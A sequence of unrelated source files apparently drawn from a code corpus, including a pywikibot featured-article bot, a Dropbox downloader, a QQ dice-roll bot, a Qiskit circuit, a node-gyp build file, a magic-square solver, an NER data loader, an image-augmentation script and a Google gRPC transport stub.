pywikibot.output('\nQuitting %s treat...' % task)
break
self.writecache()
def treat(self, fromsite, task):
if fromsite != self.site:
self.featuredWithInterwiki(fromsite, task)
def featuredArticles(self, site, task, cache):
articles = []
info = globals()[task + '_name']
if task == 'lists':
code = site.code
else:
code = 'wikidata'
try:
method = info[code][0]
except KeyError:
pywikibot.error(
"language %s doesn't has %s category source."
% (code, task))
return
name = info[code][1]
# hide #-sorted items on en-wiki
try:
hide = info[code][2]
except IndexError:
hide = None
for p in method(site, name, hide):
if p.namespace() == 0: # Article
articles.append(p)
# Article talk (like in English)
elif p.namespace() == 1 and site.code != 'el':
articles.append(pywikibot.Page(p.site,
p.title(with_ns=False)))
pywikibot.output(color_format(
'{lightred}** {0} has {1} {2} articles{default}',
site, len(articles), task))
while articles:
p = articles.pop(0)
if p.title() < self.getOption('afterpage'):
continue
if '/' in p.title() and p.namespace() != 0:
pywikibot.output('%s is a subpage' % p.title())
continue
if p.title() in cache:
pywikibot.output('(cached) %s -> %s' % (
p.title(), cache[p.title()]))
continue
yield p
def findTranslated(self, page, oursite=None):
quiet = self.getOption('quiet')
if not oursite:
oursite = self.site
if page.isRedirectPage():
page = page.getRedirectTarget()
ourpage = None
for link in page.iterlanglinks():
if link.site == oursite:
ourpage = pywikibot.Page(link)
break
if not ourpage:
if not quiet:
pywikibot.output('%s -> no corresponding page in %s'
% (page.title(), oursite))
elif ourpage.section():
pywikibot.output('%s -> our page is a section link: %s'
% (page.title(), ourpage.title()))
elif not ourpage.exists():
pywikibot.output("%s -> our page doesn't exist: %s"
% (page.title(), ourpage.title()))
else:
if ourpage.isRedirectPage():
ourpage = ourpage.getRedirectTarget()
pywikibot.output('%s -> corresponding page is %s'
% (page.title(), ourpage.title()))
if ourpage.namespace() != 0:
pywikibot.output('%s -> not in the main namespace, skipping'
% page.title())
elif ourpage.isRedirectPage():
pywikibot.output(
'%s -> double redirect, skipping' % page.title())
elif not ourpage.exists():
pywikibot.output("%s -> page doesn't exist, skipping"
% ourpage.title())
else:
backpage = None
for link in ourpage.iterlanglinks():
if link.site == page.site:
backpage = pywikibot.Page(link)
break
if not backpage:
pywikibot.output(
'%s -> no back interwiki ref' % page.title())
elif backpage == page:
# everything is ok
yield ourpage
elif backpage.isRedirectPage():
backpage = backpage.getRedirectTarget()
if backpage == page:
# everything is ok
yield ourpage
else:
pywikibot.output(
'%s -> back interwiki ref target is redirect to %s'
% (page.title(), backpage.title()))
else:
pywikibot.output('%s -> back interwiki ref target is %s'
% (page.title(), backpage.title()))
def getTemplateList(self, code, task):
add_templates = []
remove_templates = []
if task == 'featured':
try:
add_templates = template[code]
add_templates += template['_default']
except KeyError:
add_templates = template['_default']
try:
remove_templates = template_good[code]
remove_templates += template_good['_default']
except KeyError:
remove_templates = template_good['_default']
elif task == 'good':
try:
add_templates = template_good[code]
add_templates += template_good['_default']
except KeyError:
add_templates = template_good['_default']
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
elif task == 'lists':
try:
add_templates = template_lists[code]
add_templates += template_lists['_default']
except KeyError:
add_templates = template_lists['_default']
else: # task == 'former'
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
return add_templates, remove_templates
def featuredWithInterwiki(self, fromsite, task):
"""Read featured articles and find the corresponding pages.
Find corresponding pages on other sites, place the template and
remember the page in the cache dict.
"""
tosite = self.site
if fromsite.code not in self.cache:
self.cache[fromsite.code] = {}
if tosite.code not in self.cache[fromsite.code]:
self.cache[fromsite.code][tosite.code] = {}
cc = self.cache[fromsite.code][tosite.code]
if self.getOption('nocache') is True or \
fromsite.code in self.getOption('nocache'):
cc = {}
gen = self.featuredArticles(fromsite, task, cc)
if self.getOption('count'):
next(gen, None)
return # count only, we are ready here
gen = PreloadingGenerator(gen)
for source in gen:
if source.isRedirectPage():
source = source.getRedirectTarget()
if not source.exists():
pywikibot.output("source page doesn't exist: %s"
% source)
continue
for dest in self.findTranslated(source, tosite):
self.add_template(source, dest, task, fromsite)
cc[source.title()] = dest.title()
def add_template(self, source, dest, task, fromsite):
"""Place or remove the Link_GA/FA template on/from a page."""
def compile_link(site, templates):
"""Compile one link template list."""
findtemplate = '(%s)' % '|'.join(templates)
return re.compile(r'\{\{%s\|%s\}\}'
% (findtemplate.replace(' ', '[ _]'),
site.code), re.IGNORECASE)
tosite = dest.site
add_tl, remove_tl = self.getTemplateList(tosite.code, task)
re_link_add = compile_link(fromsite, add_tl)
re_link_remove = compile_link(fromsite, remove_tl)
text = dest.text
m1 = add_tl and re_link_add.search(text)
m2 = remove_tl and re_link_remove.search(text)
changed = False
interactive = self.getOption('interactive')
if add_tl:
if m1:
pywikibot.output('(already added)')
else:
# insert just before interwiki
if (not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
if self.getOption('side'):
# Placing {{Link FA|xx}} right next to
# corresponding interwiki
text = (text[:m1.end()]
+ ' {{%s|%s}}' % (add_tl[0], fromsite.code)
+ text[m1.end():])
else:
# Moving {{Link FA|xx}} to top of interwikis
iw = textlib.getLanguageLinks(text, tosite)
text = textlib.removeLanguageLinks(text, tosite)
text += '%s{{%s|%s}}%s' % (
config.LS, add_tl[0], fromsite.code, config.LS)
text = textlib.replaceLanguageLinks(text,
iw, tosite)
changed = True
if remove_tl:
if m2:
if (changed # Don't force the user to say "Y" twice
or not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
text = re.sub(re_link_remove, '', text)
changed = True
elif task == 'former':
pywikibot.output('(already removed)')
if changed:
comment = i18n.twtranslate(tosite, 'featured-' + task,
{'page': source})
try:
dest.put(text, comment)
self._save_counter += 1
except pywikibot.LockedPage:
pywikibot.output('Page %s is locked!'
% dest.title())
except pywikibot.PageNotSaved:
pywikibot.output('Page not saved')
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: unicode
"""
options = {}
local_args = pywikibot.handle_args(args)
issue_deprecation_warning(
'featured.py script', 'Wikibase Client extension',
0, UserWarning, since='20160307')
for arg in local_args:
if arg.startswith('-fromlang:'):
options[arg[1:9]] = arg[10:].split(',')
elif arg.startswith('-after:'):
options['afterpage'] = arg[7:]
elif arg.startswith('-nocache:'):
options[arg[1:8]] = arg[9:].split(',')
else:
options[arg[1:].lower()] = True
bot = FeaturedBot(**options)
bot.run()
if __name__ == '__main__':
main()
|
py | 1a4fa9bd986224e4cdc1e3c7b03a72966898fb0d | # -*- coding: utf-8 -*-
import urllib3
from dropbox import client, rest
import os
class DropboxDownloader:
def __init__(self, token_path):
self.api_client = None
urllib3.disable_warnings()
self.__oauth2(token_path)
def __oauth2(self, token_path):
with open(token_path) as f:
serialized_token = f.read()
if serialized_token.startswith('oauth2:'):
access_token = serialized_token[len('oauth2:'):]
self.api_client = client.DropboxClient(access_token)
else:
print('token error')
def do_ls(self):
resp = self.api_client.metadata('')
file_list = []
if 'contents' in resp:
for f in resp['contents']:
name = os.path.basename(f['path'])
file_list.append(name)
return file_list
def do_get(self, from_path, to_path):
to_file = open(to_path, "wb")
f, metadata = self.api_client.get_file_and_metadata(from_path)
#print 'Metadata:', metadata
to_file.write(f.read())
|
py | 1a4faa7d421204e2ce111e641334fd3bb45edd15 | import re
from nonebot import on_message, on_command
from nonebot.adapters import Bot, Event
from nonebot.log import logger
from nonebot.adapters.cqhttp.permission import GROUP
from nonebot.adapters.cqhttp.message import Message
from nonebot.rule import regex
from .common import START, SEP, CONF
from .roll import roll
RE_ROLL_STR = (
"^(" # 1
+ START
+ CONF.i7s_roll_command
+ " |"
+ CONF.i7s_roll_trigger
# 2 3 4 5 6
+ r" )([0-9adgimnsuvx+\- ]+)( ?(结果)?(大于|小于|大于等于|小于等于|>=|>|<|<=) ?(-?\d{1,10}))?"
)
RE_ROLL_CMD = re.compile(RE_ROLL_STR)
async def roll_command_handler(bot: Bot, event: Event, state: dict):
messages = []
logger.info(f"[7sRoll] received roll command: {event.raw_message}")
if await GROUP(bot, event):
messages.append(f"[CQ:at,qq={event.user_id}]")
match = None
if "_match" in state:
match = state["_matched"]
else:
args = str(event.raw_message).strip()
match = RE_ROLL_CMD.match(args)
if not match:
messages.append("roll 命令格式错误")
messages.append("格式为:roll <表达式>[ <判断方式><目标>]")
messages.append("表达式举例:3d6+1d3-1")
messages.append("判断方式可选:>, <, <=, >=, 或对应中文")
messages.append("目标:需要达成的点数")
return await cmd_roll.finish(Message("\n".join(messages)))
if match.group(1) is None:
return
expr_str, op_str, target = match.group(2, 5, 6)
messages.extend(roll(expr_str, op_str, target))
return await cmd_roll.finish(Message("\n".join(messages)))
cmd_roll = on_command(CONF.i7s_roll_command, priority=1, block=True)
cmd_roll.handle()(roll_command_handler)
message_cmd_roll = on_message(rule=regex(RE_ROLL_STR), priority=2, block=True)
message_cmd_roll.handle()(roll_command_handler)
|
py | 1a4fab0e7767447b5196c9527791d0dd9d948dd9 | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=23
prog.rx(-0.6848671984825748,input_qubit[1]) # number=26
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.h(input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=17
prog.h(input_qubit[3]) # number=37
prog.cz(input_qubit[0],input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=39
prog.x(input_qubit[3]) # number=31
prog.cx(input_qubit[0],input_qubit[3]) # number=32
prog.h(input_qubit[3]) # number=33
prog.cz(input_qubit[0],input_qubit[3]) # number=34
prog.h(input_qubit[3]) # number=35
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[3],input_qubit[0]) # number=20
prog.z(input_qubit[3]) # number=21
prog.h(input_qubit[0]) # number=27
prog.cz(input_qubit[3],input_qubit[0]) # number=28
prog.h(input_qubit[0]) # number=29
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.h(input_qubit[1]) # number=36
prog.y(input_qubit[2]) # number=11
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit2535.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
gyp | 1a4fadc7a4efee80a216bbaef21ccd0efeb33244 | ##
# Portions Copyright (c) Microsoft Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION
# ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR
# PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
##
{
'targets': [
{
'target_name': 'edge',
'win_delay_load_hook': 'false',
'include_dirs' : [
"<!(node -e \"require('nan')\")"
],
'sources': [
],
'conditions': [
['OS=="win"'
, {
'sources+': [
'src/dotnet/edge.cpp',
'src/dotnet/utils.cpp',
'src/dotnet/clrfunc.cpp',
'src/dotnet/clrfuncinvokecontext.cpp',
'src/dotnet/nodejsfunc.cpp',
'src/dotnet/nodejsfuncinvokecontext.cpp',
'src/dotnet/persistentdisposecontext.cpp',
'src/dotnet/clrfuncreflectionwrap.cpp',
'src/common/v8synchronizationcontext.cpp',
'src/dotnet/clractioncontext.cpp'
]
}
]
],
'configurations': {
'Release': {
'msvs_settings': {
'VCCLCompilerTool': {
# this is out of range and will generate a warning and skip adding RuntimeLibrary property:
'RuntimeLibrary': -1,
# this is out of range and will generate a warning and skip adding RuntimeTypeInfo property:
'RuntimeTypeInfo': -1,
'BasicRuntimeChecks': -1,
'ExceptionHandling': '0',
'AdditionalOptions': [ '/clr', '/wd4506' ]
},
'VCLinkerTool': {
'AdditionalOptions': [ '/ignore:4248' ]
}
}
},
'Debug': {
'msvs_settings': {
'VCCLCompilerTool': {
# this is out of range and will generate a warning and skip adding RuntimeLibrary property:
'RuntimeLibrary': -1,
# this is out of range and will generate a warning and skip adding RuntimeTypeInfo property:
'RuntimeTypeInfo': -1,
'BasicRuntimeChecks': -1,
'ExceptionHandling': '0',
'AdditionalOptions': [ '/clr', '/wd4506' ]
},
'VCLinkerTool': {
'AdditionalOptions': [ '/ignore:4248' ]
}
}
}
}
}
]
}
|
py | 1a4fae15797330311ed5561a351e9c3b10356d57 | import FWCore.ParameterSet.Config as cms
ptMinPFJets = cms.EDFilter(
"PtMinPFJetSelector",
src = cms.InputTag(''),
ptMin = cms.double(0)
)
|
py | 1a4fae81ff667594c0678131596b4afe1116afb6 | #coding:latin-1
class CarreMagique :
def __init__(self, coef) :
self.mat = [ [ coef[i+j*3] for i in range(3) ] for j in range(3) ]
def __str__(self) :
return "\n".join ( [ ",".join( [ str(n) for n in row ] ) for row in self.mat ] )
def __add__ (self, carre) :
coef = []
for i in range(3) :
for j in range(3) :
coef.append ( self.mat[i][j] + carre.mat[i][j])
return CarreMagique(coef)
def somme_ligne_colonne_diagonale(self):
tout = [ sum ( ligne ) for ligne in self.mat ] + \
[ sum ( [ self.mat[i][j] for j in range(3) ] ) for i in range(3) ] + \
[ sum ( [ self.mat[i][i] for i in range(3) ] ) ] + \
[ sum ( [ self.mat[2-i][i] for i in range(3) ] ) ]
return tout
def coefficient_unique(self):
d = { }
for ligne in self.mat :
for c in ligne :
d [c] = d.get(c,0) + 1
return len(d) == 9
def est_magique(self):
unique = self.coefficient_unique()
if not unique : return False
somme = self.somme_ligne_colonne_diagonale()
return min(somme) == max(somme)
def tous_les_carres_permutation_ligne12_meme_somme( permut = None, pos = 0):
if pos == 9 :
carre = CarreMagique (permut)
if carre.est_magique() :
#print (carre)
#print ()
return [ carre ]
else :
return []
else :
if pos >= 6 : # ajout
if sum ( permut[:3]) != sum(permut[3:6]) : # ajout
return [ ] # ajout
res = [ ]
if permut == None :
permut = [ i+1 for i in range(9) ]
for i in range (pos,9) :
# on permute les �l�ments i et pos
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
res += tous_les_carres_permutation_ligne12_meme_somme(permut, pos+1) # chang�
# on effectue la permutation inverse
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
return res
import time
d = time.perf_counter()
res = tous_les_carres_permutation_ligne12_meme_somme()
d = time.perf_counter() - d
print ("nombre de carr�s", len(res), " en ", d)
|
py | 1a4fae9e68d190438a4173e20ad1df0de1a0a312 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
import codecs
import collections
import torch
import pickle
import utils
import torch.nn as nn
class Loader():
def __init__(self, target_dir):
self.target_dir = target_dir
self.char2idx = collections.defaultdict(int)
self.label2idx = {'O': 0, 'I': 1, 'B': 2}
def load(self,
data_file,
make_word_dict):
with codecs.open(data_file, 'r', 'utf-8') as r:
lines = r.readlines()
# Converting format
data_features, data_labels = read_corpus(lines)
if make_word_dict:
self.char2idx = make_dic(self.char2idx, doc_sent=data_features)
unk_char_id = len(self.char2idx) - 1
unk_label_id = len(self.label2idx) - 1
sents_idx = [[[self.char2idx.get(char, unk_char_id) for char in word] \
for word in sent] \
for sent in data_features]
'''
学習データがtoyの場合のデータサンプル
'''
'''
defaultdict(<class 'int'>, {'e': 0, 'a': 1, 'i': 2, 't': 3, 's': 4, 'n': 5,
'r': 6, 'o': 7, 'h': 8, 'd': 9, 'l': 10, 'c': 11, 'u': 12, 'm': 13, 'p': 14,
'g': 15, 'f': 16, 'y': 17, 'w': 18, '.': 19, 'S': 20, 'T': 21, 'b': 22, 'E': 23,
'I': 24, 'A': 25, 'v': 26, ',': 27, 'N': 28, '1': 29, 'P': 30, 'k': 31, 'R': 32,
'L': 33, '-': 34, '0': 35, '9': 36, 'O': 37, '2': 38, 'B': 39, 'G': 40, 'C': 41,
'M': 42, 'D': 43, 'U': 44, 'F': 45, '6': 46, 'K': 47, "'": 48, '"': 49, '5': 50,
'H': 51, 'q': 52, 'W': 53, 'J': 54, '4': 55, '7': 56, '3': 57, '8': 58, 'x': 59,
'Y': 60, 'V': 61, 'j': 62, '(': 63, ')': 64, '$': 65, '/': 66, '=': 67, 'z': 68,
'+': 69, 'X': 70, 'Q': 71, '&': 72, 'Z': 73, ':': 74, '<unk>': 75})
'''
#print(data_features)
'''
[['EU', 'rejects', 'German', 'call', 'to', 'boycott', 'British', 'lamb', '.'],
['Peter', 'Blackburn'], ...
'''
#print(sents_idx)
'''
[[[23, 44], [6, 0, 62, 0, 11, 3, 4], [40, 0, 6, 13, 1, 5], [11, 1, 10, 10],
[3, 7], [22, 7, 17, 11, 7, 3, 3], [39, 6, 2, 3, 2, 4, 8], [10, 1, 13, 22], [19]],
[[30, 0, 3, 0, 6], [39, 10, 1, 11, 31, 22, 12, 6, 5]], ...
'''
labels_idx = [[self.label2idx.get(label, unk_label_id) for label in labels] \
for labels in data_labels]
#print(labels_idx)
'''
[[1, 0, 1, 0, 0, 0, 1, 0, 0],
[1, 1], ...
'''
pickle.dump([self.char2idx, self.label2idx, sents_idx, labels_idx],
open(self.target_dir + "CoNLL_char_" + data_file[19:] + ".pkl", "wb"))
def read_corpus(lines):
"""
convert corpus into features and labels
"""
features = list()
labels = list()
tmp_fl = list()
tmp_ll = list()
for line in lines:
if not (line.isspace() or (len(line) > 10 and line[0:10] == '-DOCSTART-')):
line = line.rstrip('\n').split()
tmp_fl.append(line[0])
tmp_ll.append(line[-1][0])
elif len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
tmp_fl = list()
tmp_ll = list()
if len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
return features, labels
def make_dic(char2idx, doc_sent):
# 頻度順にソートしてidをふる
words = utils.flatten(doc_sent)
chars = utils.flatten(words)
counter = collections.Counter()
counter.update(chars)
cnt = 0
for char, count in counter.most_common():
# 出現回数1回以上の文字のみ辞書に追加
if count >= 1:
char2idx[char] = cnt
cnt += 1
char2idx[u'<unk>'] = len(char2idx)
return char2idx
def main():
torch.manual_seed(1)
TARGET_DIR = '../corpus/data/'
GLOVE_FILE = '../corpus/glove.6B/glove.6B.50d.txt'
#TRAIN_FILE = TARGET_DIR + 'eng.train' # 14041 sentences
#TEST_FILE = TARGET_DIR + 'eng.test'
TRAIN_FILE = TARGET_DIR + 'toy.train' # 143 sentences
TEST_FILE = TARGET_DIR + 'toy.test'
#TRAIN_FILE = TARGET_DIR + 'mid.train' # 3153 sentences
#TEST_FILE = TARGET_DIR + 'mid.test'
EMBEDDING_DIM = 50
loader = Loader(target_dir=TARGET_DIR)
#trainの時は単語の辞書を作成する
loader.load(data_file=TRAIN_FILE,
make_word_dict=True)
#testの時は単語の辞書を作成しない
loader.load(data_file=TEST_FILE,
make_word_dict=None)
if __name__ == '__main__':
main()
|
py | 1a4faebf6fe3269c375f2f316d22294746dc7e95 | # -*- coding:UTF-8 -*-
import numpy as np
from numpy import array
from PIL import Image
from multiprocessing import Pool
import os, sys, argparse, time, cv2, shutil, random
# python python/shoes/get_data_by_edge.py -i data/shoes/img3 -b data/shoes/background -o data/shoes
img_dir = 'JPEGImages'
lbs_dir = 'labels'
def get_file_list(input_dir, backgr_dir, output_root):
if not os.path.exists(output_root):
os.mkdir(output_root)
backgr_img_set = []
for temp_img in os.listdir(backgr_dir):
if temp_img.endswith('.jpg'):
backgr_img = os.path.join(backgr_dir, temp_img)
backgr_img_set.append(backgr_img)
input_img_list = []
output_img_list = []
output_txt_list = []
for temp_img in os.listdir(input_dir):
if temp_img.endswith('.jpg'):
input_img = os.path.join(input_dir, temp_img)
temp_name = temp_img[:temp_img.rfind('.')]
output_img = os.path.join(output_root, img_dir, temp_name+'-add.jpg')
output_txt = os.path.join(output_root, lbs_dir, temp_name+'-add.txt')
input_img_list.append(input_img)
output_img_list.append(output_img)
output_txt_list.append(output_txt)
output_num = len(output_img_list)
backgr_num = len(backgr_img_set)
times = output_num/backgr_num + 1
backgr_img_list = random.sample(times*backgr_img_set, output_num)
return input_img_list, backgr_img_list, output_img_list, output_txt_list
def get_img_edge((input_img_file, backgr_img_file, output_img_file, output_txt_file)):
print input_img_file
img = cv2.imread(input_img_file)
top, right, bottom, left, canimg = get_bbox_by_canny(img)
box_w, box_h = right-left, bottom-top
if box_w*box_h > img.shape[1]*img.shape[0]/16.0:
re_img = np.ones((4*box_h, 4*box_w, img.shape[2]), np.uint8)*255
re_top, re_right, re_bottom, re_left = \
box_h*3/2, box_w*5/2, box_h*5/2, box_w*3/2
re_img[re_top:re_bottom, re_left:re_right, :] = img[top:bottom, left:right, :]
top, right, bottom, left, canimg = get_bbox_by_canny(re_img)
img = re_img
width, height = img.shape[1], img.shape[0]
output_labels(top, right, bottom, left, width, height, output_txt_file)
mask = np.zeros(img.shape[:2], np.uint8)
bgdModel = np.zeros((1, 65), np.float64)
fgdModel = np.zeros((1, 65), np.float64)
rect = (left, top, right - left, bottom - top)
cv2.grabCut(img, mask, rect, bgdModel, fgdModel, 3, cv2.GC_INIT_WITH_RECT)
mask2 = np.where((mask==2)|(mask==0), 0, 1).astype('uint8')
img = img*mask2[:, :, np.newaxis]
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (199, 199))
th3 = cv2.dilate(canimg, kernel)
bin_img = cv2.bitwise_and(th3, th3, mask=mask2)
cv2.imwrite('temp.png', img)
cv2.imwrite('temp.bmp', bin_img)
img = Image.open('temp.png')
bin_img = Image.open('temp.bmp')
bg_img = Image.open(backgr_img_file)
img = img.convert("RGBA")
bg_img = bg_img.convert("RGBA")
bg_img = bg_img.resize(img.size)
bg_img.paste(img, (0, 0, img.size[0], img.size[1]), bin_img)
bg_img.save(output_img_file)
def get_bbox_by_canny(img):
grayed = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
grayed = cv2.blur(grayed, (3, 3))
width = grayed.shape[1]
height = grayed.shape[0]
canimg = cv2.Canny(grayed, 50, 80)
if np.max(canimg) == 0:
top = 0
right = width - 1
bottom = height - 1
left = 0
else:
linepix = np.where(canimg == 255)
top = min(linepix[0])
right = max(linepix[1])
bottom = max(linepix[0])
left = min(linepix[1])
return top, right, bottom, left, canimg
def output_labels(top, right, bottom, left, width, height, output_txt_file):
x = (left + right)/2.0
y = (top + bottom)/2.0
w = right - left
h = bottom - top
x, y, w, h = x/width, y/height, w*1.0/width, h*1.0/height
line = array([[0, x, y, w, h]])
np.savetxt(output_txt_file, line, fmt="%d %f %f %f %f")
def get_args():
parser = argparse.ArgumentParser(description = 'get shoes data')
parser.add_argument('-i', dest = 'input_dir',
help = 'input dir of images', default = None, type = str)
parser.add_argument('-b', dest = 'backgr_dir',
help = 'background dir of images', default = None, type = str)
parser.add_argument('-o', dest = 'output_root',
help = 'output root of JPEGImages and labels', default = None, type = str)
parser.add_argument('-c', dest = 'cpu_num',
help = 'cpu number', default = 8, type = int)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = get_args()
input_dir = args.input_dir
backgr_dir = args.backgr_dir
output_root = args.output_root
cpu_num = args.cpu_num
tic = time.time()
input_img_list, backgr_img_list, output_img_list, output_txt_list = \
get_file_list(input_dir, backgr_dir, output_root)
'''
pool = Pool(cpu_num)
pool.map(get_img_edge, zip(input_img_list, backgr_img_list, \
output_img_list, output_txt_list))
'''
for arguments in zip(input_img_list, backgr_img_list, output_img_list, output_txt_list):
get_img_edge(arguments)
toc = time.time()
print 'running time: {} seconds'.format(toc-tic) |
py | 1a4faf0201c0420e181bf8fa67b884c627ff8928 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.servicedirectory_v1beta1.types import lookup_service
from .base import LookupServiceTransport, DEFAULT_CLIENT_INFO
class LookupServiceGrpcTransport(LookupServiceTransport):
"""gRPC backend transport for LookupService.
Service Directory API for looking up service data at runtime.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
